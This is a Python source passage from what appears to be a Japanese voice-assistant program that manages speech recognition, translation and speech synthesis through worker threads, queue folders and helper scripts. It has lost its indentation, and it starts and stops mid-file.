control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiInp = 'docomo'
qApiOut = 'free'
if (qOS == 'windows'):
qApiOut = 'winos'
if (qOS == 'darwin'):
qApiOut = 'macos'
speechtext = u'こんにちは。私は「ドコモ」のクラウドAIです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能は、「ドコモ」のクラウドAIが処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if ((procText == 'winos') or (procText == 'windows')) and (qOS == 'windows') and (locked_ai == False):
if (qApiOut == 'winos'):
speechtext = u'ja,hoya,既にWINDOWSのOSの音声合成機能で処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,WINDOWSのOSの音声合成機能に移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiOut = 'winos'
speechtext = u'こんにちは。私はWINDOWSのOSです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声合成機能は、WINDOWSのOSが処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if ((procText == 'macos') or (procText == 'osx')) and (qOS == 'darwin') and (locked_ai == False):
if (qApiOut == 'macos'):
speechtext = u'ja,hoya,既にMACのOSの音声合成機能で処理中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,MACのOSの音声合成機能に移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qLangTrn = 'en'
qLangOut = qLangTrn[:2]
qApiOut = 'macos'
speechtext = u'こんにちは。私はMACのOSです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声合成機能は、MACのOSが処理します。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == 'audio stop') or (procText == 'voice stop'):
if (qApiOut == 'none'):
speechtext = u'ja,hoya,既に音声合成機能は停止中です。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = u'ja,hoya,音声合成機能を停止します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qApiOut = 'none'
if ((procText == 'ai test') or (procText == 'api test')) and (locked_ai == False):
qApiInp = 'docomo'
qApiTrn = 'free'
qApiOut = 'hoya'
speechtext = u'ja,hoya,新しいクラウドAIのテストモードに移行します。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声認識機能は、docomoのクラウドAIが処理します。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'音声合成機能は、HOYAのクラウドAIが行います。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'残念ながら日本語英語しか話せません。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, 'ja', speechtext, )
speechtext = u'よろしくお願いします。'
control_speech('04', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, 'ja', speechtext, )
qLangTrn = 'ja'
qLangOut = qLangTrn[:2]
control_start=0
control_beat =0
control_busy =False
control_last =0
control_seq =0
#control_web =False
def proc_control(cn_r, cn_s, ):
global qOS
global qPathCtrl
global qPathInp
global qPathWav
global qPathSTT
global qPathTTS
global qPathTRA
global qPathPlay
global qPathRec
global qPathWork
global qBusyCtrl
global qBusyInput
global qBusySTT
global qBusyTTS
global qBusyPlay
global control_start
global control_beat
global control_busy
global control_last
global control_seq
global control_web
qLogOutput('speechCtrl:init')
runMode = cn_r.get()
micDev = cn_r.get()
micType = cn_r.get()
micGuide = cn_r.get()
cn_r.task_done()
qLogOutput('speechCtrl:runMode =' + str(runMode ))
qLogOutput('speechCtrl:micDev =' + str(micDev ))
qLogOutput('speechCtrl:micType =' + str(micType ))
qLogOutput('speechCtrl:micGuide=' + str(micGuide))
qLogOutput('speechCtrl:start')
control_start=time.time()
if (str(micDev) != 'file'):
qBusySet(qBusyCtrl, True)
#qBusyCheck(qBusyCtrl , 3)
#qBusyCheck(qBusySTT , 3)
#qBusyCheck(qBusyTTS , 3)
qBusyCheck(qBusyPlay , 3)
if (micType == 'bluetooth') or (micGuide == 'on' or micGuide == 'sound'):
qBusyCheck(qBusyInput , 3)
speechtext = u'こんにちは。' + runMode + u'機能を起動しました。'
control_speech('00', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (str(micDev) != 'file') and (runMode=='handsfree'):
speechtext = '翻訳機能を起動しました。'
control_speech('01', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (micType == 'bluetooth'):
speechtext = micType + u'マイク制御機能を起動しました。'
control_speech('11', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
else:
speechtext = micType + u'マイク制御機能を起動しました。'
control_speech('11', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'全ての機能が並列処理で起動しました。'
control_speech('12', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'連続した音声入力が使用できます。'
control_speech('13', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'vision start'
control_sub( '21', 'control', runMode, micDev, speechtext, 'en', )
speechtext = u'play start'
control_sub( '22', 'control', runMode, micDev, speechtext, 'en', )
time.sleep(20.00)
if (str(micDev) != 'file'):
speechtext = u'全ての準備が整いました。スタンバイしています。'
control_speech('88', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
qBusySet(qBusyCtrl, False)
lasttext = ''
lastlang = ''
while (True):
control_beat = time.time()
if (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
if (mode_get is None):
qLogOutput('speechCtrl:None=break')
break
if (cn_r.qsize() > 1) or (cn_s.qsize() > 1):
qLogOutput('speechCtrl: queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
if (mode_get == 'PASS'):
#control_last = time.time()
cn_s.put(['PASS', ''])
else:
control_busy = True
result = 'OK'
path = qPathCtrl
files = glob.glob(path + '*')
if (len(files) > 0):
try:
for f in files:
file=f.replace('\\', '/')
if (file[-4:].lower() == '.txt' and file[-8:].lower() != '.tmp.txt'):
f1=file
f2=file[:-4] + '.tmp.txt'
try:
os.rename(f1, f2)
file=f2
except:
pass
if (file[-8:].lower() == '.tmp.txt'):
f1=file
f2=file[:-8] + file[-4:]
try:
os.rename(f1, f2)
file=f2
except:
pass
fileId = file.replace(path, '')
fileId = fileId[:-4]
control_seq += 1
if (control_seq >= 10000):
control_seq = 1
seq4 = '{:04}'.format(control_seq)
seq2 = seq4[-2:]
wrkfile = qPathWork + 'control.' + seq2 + '.txt'
if (os.path.exists(wrkfile)):
try:
os.remove(wrkfile)
except:
pass
txt = ''
try:
rt = codecs.open(file, 'r', 'utf-8')
for t in rt:
txt = (txt + ' ' + str(t)).strip()
rt.close
rt = None
except:
rt = None
lang = ''
if (file[-7:] == '.ja.txt'):
lang = 'ja'
if (file[-21:] == '.en.stt.translate.txt'):
lang = 'en'
os.remove(file)
txt = str(txt).strip()
if (txt != '' and txt != '!'):
if (txt == lasttext and lang == lastlang):
if (runMode == 'debug'):
qLogOutput('speechCtrl:(pass)' + txt + '(' + lang + ')')
else:
lasttext=txt
lastlang=lang
if (runMode == 'debug'):
qLogOutput('speechCtrl:(exec)' + txt + '(' + lang + ')')
try:
w = codecs.open(wrkfile, 'w', 'utf-8')
w.write(txt)
w.close()
w = None
except:
w = None
if (os.path.exists(wrkfile)):
control_last = time.time()
if (qOS == 'windows'):
sendkey = subprocess.Popen(['python', '_speech_a3_sendmessage.py', wrkfile, ], )
#sendkey.wait()
#sendkey.terminate()
#sendkey = None
if (runMode=='debug') or (runMode=='handsfree'):
if (txt == u'デモ紹介') or (txt == u'デモンストレーション'):
speechtext = u'reset'
control_sub( '00', 'control', runMode, micDev, speechtext, 'en', )
speechtext = u'default'
control_sub( '01', 'control', runMode, micDev, speechtext, 'en', )
time.sleep( 3.00)
if (runMode=='debug') or (runMode=='handsfree'):
if (txt == u'システム終了' or txt == u'バルス'):
speechtext = u'システム終了プロセスを開始しました。'
control_speech('90', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
time.sleep( 3.00)
control_sub(seq4, fileId, runMode, micDev, txt, lang, )
if (runMode=='debug') or (runMode=='handsfree'):
if (txt == u'システム終了' or txt == u'バルス'):
speechtext = runMode + u'機能を終了しました。'
control_speech('91', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
time.sleep(10.00)
speechtext = u'さようなら。また、よろしくお願いします。'
control_speech('99', 'control', runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
cn_s.put(['END', ''])
time.sleep( 5.00)
break
except:
pass
result = 'NG'
#if (str(micDev) == 'file'):
# if (result == 'OK'):
# cn_s.put(['END', ''])
# time.sleep( 5.00)
# break
# else:
# cn_s.put(['ERROR', ''])
# time.sleep( 5.00)
# break
#else:
cn_s.put([result, ''])
control_busy = False
qBusySet(qBusyCtrl, False)
if (cn_r.qsize() == 0):
time.sleep(0.25)
else:
time.sleep(0.10)
qLogOutput('speechCtrl:terminate')
while (cn_r.qsize() > 0):
try:
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
except:
pass
qLogOutput('speechCtrl:end')
def stt_sub(seq, fileId, runMode, micDev, file, ):
global qApiInp
global qApiTrn
global qApiOut
global qLangInp
global qLangTrn
global qLangTxt
global qLangOut
global qPathCtrl
global qPathInp
global qPathWav
global qPathSTT
global qPathTTS
global qPathTRA
global qPathPlay
global qPathRec
global qPathWork
if (runMode == 'handsfree') or (runMode == 'translator'):
inpInput = file
inpOutput= qPathSTT + fileId + '.' + qLangInp + '.txt'
trnInput = inpOutput
trnOutput= qPathTRA + fileId + '.' + qLangInp + '.' + qLangTrn[:2] + '.stt.translate.txt'
txtInput = ''
txtOutput= ''
outInput = trnOutput
outOutput= qPathPlay + fileId + '.' + qLangOut + '.voice.mp3'
inpPlay = 'off'
txtPlay = 'off'
outPlay = 'off'
if (runMode == 'debug') or (runMode == 'learning'):
inpInput = file
inpOutput= qPathSTT + fileId + '.' + qLangInp + '.txt'
trnInput = inpOutput
trnOutput= qPathTRA + fileId + '.' + qLangInp + '.' + qLangTrn[:2] + '.stt.translate.txt'
txtInput = inpOutput
txtOutput= qPathPlay + fileId + '.' + qLangOut + '.feedback.mp3'
outInput = trnOutput
outOutput= qPathPlay + fileId + '.' + qLangOut + '.voice.mp3'
qLangTxt = qLangInp
inpPlay = 'off'
txtPlay = 'off'
outPlay = 'off'
if (runMode == 'speech') or (runMode == 'number'):
inpInput = file
inpOutput= qPathSTT + fileId + '.' + qLangInp + '.txt'
trnInput = ''
trnOutput= ''
if (micDev != 'file'):
trnInput = inpOutput
trnOutput= qPathTRA + fileId + '.' + qLangInp + '.' + qLangTrn[:2] + '.stt.translate.txt'
txtInput = ''
txtOutput= ''
outInput = ''
outOutput= ''
inpPlay = 'off'
txtPlay = 'off'
outPlay = 'off'
if (qApiOut == 'none'):
txtOutput= ''
outOutput= ''
if (True):
api = subprocess.Popen(['python', '_speech_a3_all_api.py', \
runMode, micDev, qApiInp, qApiTrn, qApiOut, qLangInp, qLangTrn, qLangTxt, qLangOut, \
'STT'+str(seq), fileId, inpInput, inpOutput, trnInput, trnOutput, txtInput, txtOutput, outInput, outOutput, \
inpPlay, txtPlay, outPlay, ], \
)
#api.wait()
#api.terminate()
#api = None
time.sleep(3.00)
if (str(micDev) == 'file'):
if (seq[-1:] == '0'):
api.wait()
api.terminate()
api = None
time.sleep(20.00)
sttcore_start=0
sttcore_beat =0
sttcore_busy =False
sttcore_last =0
sttcore_seq =0
def proc_sttcore(cn_r, cn_s, ):
global qPathCtrl
global qPathInp
global qPathWav
global qPathSTT
global qPathTTS
global qPathTRA
global qPathPlay
global qPathRec
global qPathWork
global qBusyCtrl
global qBusyInput
global qBusySTT
global qBusyTTS
global qBusyPlay
global sttcore_start
global sttcore_beat
global sttcore_busy
global sttcore_last
global sttcore_seq
qLogOutput('stt_core__:init')
runMode = cn_r.get()
micDev = cn_r.get()
micType = cn_r.get()
micGuide = cn_r.get()
cn_r.task_done()
qLogOutput('stt_core__:runMode =' + str(runMode ))
qLogOutput('stt_core__:micDev =' + str(micDev ))
qLogOutput('stt_core__:micType =' + str(micType ))
qLogOutput('stt_core__:micGuide=' + str(micGuide))
qLogOutput('stt_core__:start')
sttcore_start=time.time()
while (True):
sttcore_beat = time.time()
if (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
if (mode_get is None):
qLogOutput('stt_core__:None=break')
break
if (cn_r.qsize() > 1) or (cn_s.qsize() > 1):
qLogOutput('stt_core__: queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
if (mode_get == 'PASS'):
#sttcore_last = time.time()
cn_s.put(['PASS', ''])
else:
sttcore_busy = True
result = 'OK'
path = qPathWav
files = glob.glob(path + '*')
if (len(files) > 0):
qBusySet(qBusySTT, True)
if (str(micDev) == 'file'):
for f in files:
qLogOutput(f)
qBusyCheck(qBusyCtrl , 3)
#qBusyCheck(qBusySTT , 3)
#qBusyCheck(qBusyTTS , 3)
#qBusyCheck(qBusyPlay , 3)
if (micType == 'bluetooth') or (micGuide == 'on' or micGuide == 'sound'):
qBusyCheck(qBusyInput , 3)
files = glob.glob(path + '*')
if (len(files) > 0):
try:
for f in files:
file=f.replace('\\', '/')
if (file[-4:].lower() == '.wav' and file[-8:].lower() != '.tmp.wav'):
f1=file
f2=file[:-4] + '.tmp.wav'
try:
os.rename(f1, f2)
file=f2
except:
pass
if (file[-4:].lower() == '.mp3' and file[-8:].lower() != '.tmp.mp3'):
f1=file
f2=file[:-4] + '.tmp.mp3'
try:
os.rename(f1, f2)
file=f2
except:
pass
if (file[-8:].lower() == '.tmp.wav' or file[-8:].lower() == '.tmp.mp3'):
f1=file
f2=file[:-8] + file[-4:]
try:
os.rename(f1, f2)
file=f2
except:
pass
fileId = file.replace(path, '')
fileId = fileId[:-4]
sttcore_seq += 1
if (sttcore_seq >= 10000):
sttcore_seq = 1
seq4 = '{:04}'.format(sttcore_seq)
seq2 = seq4[-2:]
wrkfile = qPathWork + 'sttcore.' + seq2 + '.wav'
if (os.path.exists(wrkfile)):
try:
os.remove(wrkfile)
except:
pass
sox = subprocess.Popen(['sox', '-q', file, '-r', '16000', '-b', '16', '-c', '1', wrkfile, ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
sox.wait()
sox.terminate()
sox = None
if (str(micDev) != 'file'):
os.remove(file)
if (os.path.exists(wrkfile)):
if (micDev == 'file'):
qLogOutput('')
qLogOutput('stt_core__:' + fileId + u' → ' + wrkfile[:-4])
sttcore_last = time.time()
stt_sub(seq4, fileId, runMode, micDev, wrkfile, )
except:
pass
result = 'NG'
if (str(micDev) == 'file'):
if (result == 'OK'):
cn_s.put(['END', ''])
time.sleep( 5.00)
break
else:
cn_s.put(['ERROR', ''])
time.sleep( 5.00)
break
else:
cn_s.put([result, ''])
sttcore_busy = False
qBusySet(qBusySTT, False)
if (cn_r.qsize() == 0):
time.sleep(0.25)
else:
time.sleep(0.10)
qLogOutput('stt_core__:terminate')
while (cn_r.qsize() > 0):
try:
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
except:
pass
qLogOutput('stt_core__:end')
def tts_sub(seq, fileId, runMode, micDev, file, txtText, ):
global qApiInp
global qApiTrn
global qApiOut
global qLangInp
global qLangTrn
global qLangTxt
global qLangOut
global qPathCtrl
global qPathInp
global qPathWav
global qPathSTT
global qPathTTS
global qPathTRA
global qPathPlay
global qPathRec
global qPathWork
inpLang = qLangTxt
trnLang = qLangTrn
outLang = qLangOut
while (txtText[:3] == 'ja,' or txtText[:3] == 'en,'):
inpLang = txtText[:2]
trnLang = txtText[:2]
outLang = txtText[:2]
txtText = txtText[3:]
if (inpLang != trnLang) or (inpLang != outLang):
inpInput = ''
inpOutput= ''
trnInput = file
trnOutput= qPathTRA + fileId + '.' + inpLang + '.' + trnLang[:2] + '.tts.translate.txt'
txtInput = ''
txtOutput= ''
outInput = trnOutput
outOutput= qPathPlay + fileId + '.' + outLang + '.voice.mp3'
inpPlay = 'off'
txtPlay = 'off'
outPlay = 'off'
else:
inpInput = ''
inpOutput= ''
trnInput = ''
trnOutput= ''
txtInput = file
txtOutput= qPathPlay + fileId + '.' + inpLang + '.' + inpLang + '.mp3'
outInput = ''
outOutput= ''
inpPlay = 'off'
txtPlay = 'off'
outPlay = 'off'
if (qApiOut == 'none'):
txtOutput= ''
outOutput= ''
if (True):
api = subprocess.Popen(['python', '_speech_a3_all_api.py', \
#runMode, micDev, qApiInp, qApiTrn, qApiOut, qLangInp, qLangTrn, qLangTxt, qLangOut, \
runMode, micDev, qApiInp, qApiTrn, qApiOut, qLangTxt, qLangTrn, qLangTxt, qLangOut, \
'TTS'+str(seq), fileId, inpInput, inpOutput, trnInput, trnOutput, txtInput, txtOutput, outInput, outOutput, \
inpPlay, txtPlay, outPlay, ], \
)
#api.wait()
#api.terminate()
#api = None
time.sleep(2.00)
if (str(micDev) == 'file'):
if (seq[-1:] == '0'):
api.wait()
api.terminate()
api = None
time.sleep(5.00)
ttscore_start=0
ttscore_beat =0
ttscore_busy =False
ttscore_last =0
ttscore_seq =0
def proc_ttscore(cn_r, cn_s, ):
global qPathCtrl
global qPathInp
global qPathWav
global qPathSTT
global qPathTTS
global qPathTRA
global qPathPlay
global qPathRec
global qPathWork
global qBusyCtrl
global qBusyInput
global qBusySTT
global qBusyTTS
global qBusyPlay
global ttscore_start
global ttscore_beat
global ttscore_busy
global ttscore_last
global ttscore_seq
qLogOutput('tts_core__:init')
runMode = cn_r.get()
micDev = cn_r.get()
micType = cn_r.get()
micGuide = cn_r.get()
cn_r.task_done()
qLogOutput('tts_core__:runMode =' + str(runMode ))
qLogOutput('tts_core__:micDev =' + str(micDev ))
qLogOutput('tts_core__:micType =' + str(micType ))
qLogOutput('tts_core__:micGuide=' + str(micGuide))
qLogOutput('tts_core__:start')
ttscore_start=time.time()
while (True):
ttscore_beat = time.time()
if (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
if (mode_get is None):
qLogOutput('tts_core__:None=break')
break
if (cn_r.qsize() > 1) or (cn_s.qsize() > 1):
qLogOutput('tts_core__: queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
if (mode_get == 'PASS'):
#ttscore_last = time.time()
cn_s.put(['PASS', ''])
else:
ttscore_busy = True
result = 'OK'
path = qPathTTS
files = glob.glob(path + '*')
if (len(files) > 0):
qBusySet(qBusyTTS, True)
if (str(micDev) == 'file'):
for f in files:
qLogOutput(f)
#qBusyCheck(qBusyCtrl , 3)
#qBusyCheck(qBusyTTS , 3)
#qBusyCheck(qBusySTT , 3)
#qBusyCheck(qBusyPlay , 3)
if (micType == 'bluetooth') or (micGuide == 'on' or micGuide == 'sound'):
qBusyCheck(qBusyInput , 3)
files = glob.glob(path + '*')
if (len(files) > 0):
try:
for f in files:
file=f.replace('\\', '/')
if (file[-4:].lower() == '.txt' and file[-8:].lower() != '.tmp.txt'):
f1=file
f2=file[:-4] + '.tmp.txt'
try:
os.rename(f1, f2)
file=f2
except:
pass
if (file[-8:].lower() == '.tmp.txt'):
f1=file
f2=file[:-8] + file[-4:]
try:
os.rename(f1, f2)
file=f2
except:
pass
fileId = file.replace(path, '')
fileId = fileId[:-4]
ttscore_seq += 1
if (ttscore_seq >= 10000):
ttscore_seq = 1
seq4 = '{:04}'.format(ttscore_seq)
seq2 = seq4[-2:]
wrkfile = qPathWork + 'ttscore.' + seq2 + '.txt'
if (os.path.exists(wrkfile)):
try:
os.remove(wrkfile)
except:
pass
txt = ''
try:
rt = codecs.open(file, 'r', 'utf-8')
for t in rt:
txt = (txt + ' ' + str(t)).strip()
rt.close
rt = None
except:
rt = None
txt = str(txt).strip()
if (txt != '' and txt != '!'):
try:
w = codecs.open(wrkfile, 'w', 'utf-8')
w.write(txt)
w.close()
w = None
except:
w = None
if (str(micDev) != 'file'):
os.remove(file)
if (os.path.exists(wrkfile)):
if (micDev == 'file'):
qLogOutput('')
qLogOutput('tts_core__:' + fileId + u' → ' + wrkfile)
ttscore_last = time.time()
tts_sub(seq4, fileId, runMode, micDev, wrkfile, txt, )
except:
pass
result = 'NG'
if (str(micDev) == 'file'):
if (result == 'OK'):
cn_s.put(['END', ''])
time.sleep( 5.00)
break
else:
cn_s.put(['ERROR', ''])
time.sleep( 5.00)
break
else:
cn_s.put([result, ''])
ttscore_busy = False
qBusySet(qBusyTTS, False)
if (cn_r.qsize() == 0):
time.sleep(0.25)
else:
time.sleep(0.10)
qLogOutput('tts_core__:terminate')
while (cn_r.qsize() > 0):
try:
cn_r_get = cn_r.get()
mode_get = cn_r_get[0]
data_get = cn_r_get[1]
cn_r.task_done()
except:
pass
qLogOutput('tts_core__:end')
def main_init(runMode, micDev, ):
global qPathCtrl
global qPathInp
global qPathWav
global qPathSTT
global qPathTTS
global qPathTRA
global qPathPlay
global qPathRec
global qPathWork
global qBusyCtrl
global qBusyInput
global qBusySTT
global qBusyTTS
global qBusyPlay
global qCtrlBgm
global qCtrlWeb
global qCtrlChatting
global qCtrlKnowledge
global qCtrlVision
global qCtrlRecognize
global qCtrlTranslate
qMakeDirs('temp/_log/', False)
qMakeDirs('temp/_cache/', False)
if (str(micDev) != 'file'):
qMakeDirs(qPathCtrl, True )
qMakeDirs(qPathInp, True )
qMakeDirs(qPathWav, True )
qMakeDirs(qPathSTT, True )
qMakeDirs(qPathTTS, True )
qMakeDirs(qPathTRA, True )
qMakeDirs(qPathPlay, True )
qMakeDirs(qPathRec, False)
qMakeDirs(qPathWork, True )
else:
qMakeDirs(qPathCtrl, True )
qMakeDirs(qPathInp, False)
qMakeDirs(qPathWav, True )
qMakeDirs(qPathSTT, True )
qMakeDirs(qPathTTS, False)
qMakeDirs(qPathTRA, True )
qMakeDirs(qPathPlay, True )
qMakeDirs(qPathRec, False)
qMakeDirs(qPathWork, True )
qBusySet(qBusyCtrl, False )
qBusySet(qBusyInput, False )
qBusySet(qBusySTT, False )
qBusySet(qBusyTTS, False )
qBusySet(qBusyPlay, False )
qBusySet(qCtrlBgm, False )
qBusySet(qCtrlWeb, False )
qBusySet(qCtrlChatting, False )
qBusySet(qCtrlKnowledge, False )
qBusySet(qCtrlVision, False )
qBusySet(qCtrlRecognize, False )
qBusySet(qCtrlTranslate, False )
main_start=0
main_beat =0
main_busy =False
main_last =0
if (__name__ == '__main__'):
#global main_beat
#global sttcore_beat
qLogOutput('___main___:init')
qLogOutput('___main___:exsample.py runMode, api..., lang..., micDev, micType, micGuide, micLevel, path..., ')
#runMode handsfree, translator, speech, ...,
# knowledge, learning, number,
#api free, google, watson, azure, nict, winos, macos, docomo,
#lang ja, en, fr, kr...
#micDev num or file
#micType usb or bluetooth
#micGuide off, on, display, sound
runMode = 'handsfree'
micDev = '0'
micType = 'bluetooth'
micGuide = 'on'
micLevel = '0'
if (len(sys.argv) >= 2):
runMode = str(sys.argv[1]).lower()
if (len(sys.argv) >= 3):
micDev = str(sys.argv[2]).lower()
if (str(micDev) == 'file'):
micGuide = 'off'
if (len(sys.argv) >= 4):
micType = str(sys.argv[3]).lower()
if (len(sys.argv) >= 5):
micGuide = str(sys.argv[4]).lower()
if (len(sys.argv) >= 6):
p = str(sys.argv[5]).lower()
if (p.isdigit() and p != '0'):
micLevel = p
if (len(sys.argv) >= 7):
qApiInp = str(sys.argv[6]).lower()
if (qApiInp == 'google') or (qApiInp == 'watson') \
or (qApiInp == 'azure') or (qApiInp == 'nict'):
qApiTrn = qApiInp
qApiOut = qApiInp
else:
qApiTrn = 'free'
qApiOut = 'free'
if (qApiInp == 'nict'):
#qLangTrn = 'en,fr,es,id,my,th,vi,zh,ko,'
qLangTrn = 'en,fr,es,id,zh,ko,'
qLangOut = qLangTrn[:2]
if (len(sys.argv) >= 8):
qApiTrn = str(sys.argv[7]).lower()
if (len(sys.argv) >= 9):
qApiOut = str(sys.argv[8]).lower()
if (len(sys.argv) >= 10):
qLangInp = str(sys.argv[9]).lower()
qLangTxt = qLangInp
if (len(sys.argv) >= 11):
qLangTrn = str(sys.argv[10]).lower()
qLangOut = qLangTrn[:2]
if (len(sys.argv) >= 12):
qLangTxt = str(sys.argv[11]).lower()
if (len(sys.argv) >= 13):
qLangOut = str(sys.argv[12]).lower()
qLogOutput('')
qLogOutput('___main___:runMode =' + str(runMode ))
qLogOutput('___main___:micDev =' + str(micDev ))
qLogOutput('___main___:micType =' + str(micType ))
qLogOutput('___main___:micGuide =' + str(micGuide ))
qLogOutput('___main___:micLevel =' + str(micLevel ))
qLogOutput('___main___:qApiInp =' + str(qApiInp ))
qLogOutput('___main___:qApiTrn =' + str(qApiTrn ))
qLogOutput('___main___:qApiOut =' + str(qApiOut ))
qLogOutput('___main___:qLangInp =' + str(qLangInp ))
qLogOutput('___main___:qLangTrn =' + str(qLangTrn ))
qLogOutput('___main___:qLangTxt =' + str(qLangTxt ))
qLogOutput('___main___:qLangOut =' + str(qLangOut ))
main_init(runMode, micDev, )
if (True):
qLogOutput('')
voice2wav = subprocess.Popen(['python', '_speech_a3_voice2wav.py', \
runMode, micDev, micType, micGuide, micLevel, \
], )
#], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True, )
#], stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
time.sleep(2.00)
if (str(micDev) == 'file'):
voice2wav.wait()
voice2wav.terminate()
voice2wav = None
qLogOutput('')
playvoice = subprocess.Popen(['python', '_speech_a3_playvoice.py', \
runMode, micDev, micType, micGuide, micLevel, \
], )
#], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True, )
#], stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
time.sleep(2.00)
qLogOutput('')
qLogOutput('___main___:start')
main_start = time.time()
main_beat = 0
control_s = queue.Queue()
control_r = queue.Queue()
control_proc = None
control_beat = 0
control_pass = 0
sttcore_s = queue.Queue()
sttcore_r = queue.Queue()
sttcore_proc = None
sttcore_beat = 0
sttcore_pass = 0
ttscore_s = queue.Queue()
ttscore_r = queue.Queue()
ttscore_proc = None
ttscore_beat = 0
ttscore_pass = 0
while (True):
main_beat = time.time()
# check sttcore_last and ttscore_last
if (str(micDev) == 'file'):
if (sttcore_last == 0):
sttcore_last = time.time()
if (ttscore_last == 0):
ttscore_last = time.time()
sec1 = int(time.time() - sttcore_last)
sec2 = int(time.time() - ttscore_last)
if (sec1 > 240 and sec2 > 240):
break
# Thread timeout check
if (control_beat != 0):
if (str(micDev) != 'file'):
sec = int(time.time() - control_beat)
if (sec > 60):
qLogOutput('___main___:control_proc 60s')
qLogOutput('___main___:control_proc break')
control_s.put([None, None])
time.sleep(3.00)
control_proc = None
control_beat = 0
control_pass = 0
if (sttcore_beat != 0):
if (str(micDev) != 'file'):
sec = int(time.time() - sttcore_beat)
if (sec > 60):
qLogOutput('___main___:sttcore_proc 60s')
qLogOutput('___main___:sttcore_proc break')
sttcore_s.put([None, None])
time.sleep(3.00)
sttcore_proc = None
sttcore_beat = 0
sttcore_pass = 0
if (ttscore_beat != 0):
if (str(micDev) != 'file'):
sec = int(time.time() - ttscore_beat)
if (sec > 60):
qLogOutput('___main___:ttscore_proc 60s')
qLogOutput('___main___:ttscore_proc break')
ttscore_s.put([None, None])
time.sleep(3.00)
ttscore_proc = None
ttscore_beat = 0
ttscore_pass = 0
# Thread start
if (control_proc is None):
while (control_s.qsize() > 0):
dummy = control_s.get()
while (control_r.qsize() > 0):
dummy = control_r.get()
control_proc = threading.Thread(target=proc_control, args=(control_s,control_r,))
control_proc.daemon = True
control_s.put(runMode )
control_s.put(micDev )
control_s.put(micType )
control_s.put(micGuide)
control_proc.start()
time.sleep(1.00)
control_s.put(['START', ''])
if (sttcore_proc is None):
while (sttcore_s.qsize() > 0):
dummy = sttcore_s.get()
while (sttcore_r.qsize() > 0):
dummy = sttcore_r.get()
sttcore_proc = threading.Thread(target=proc_sttcore, args=(sttcore_s,sttcore_r,))
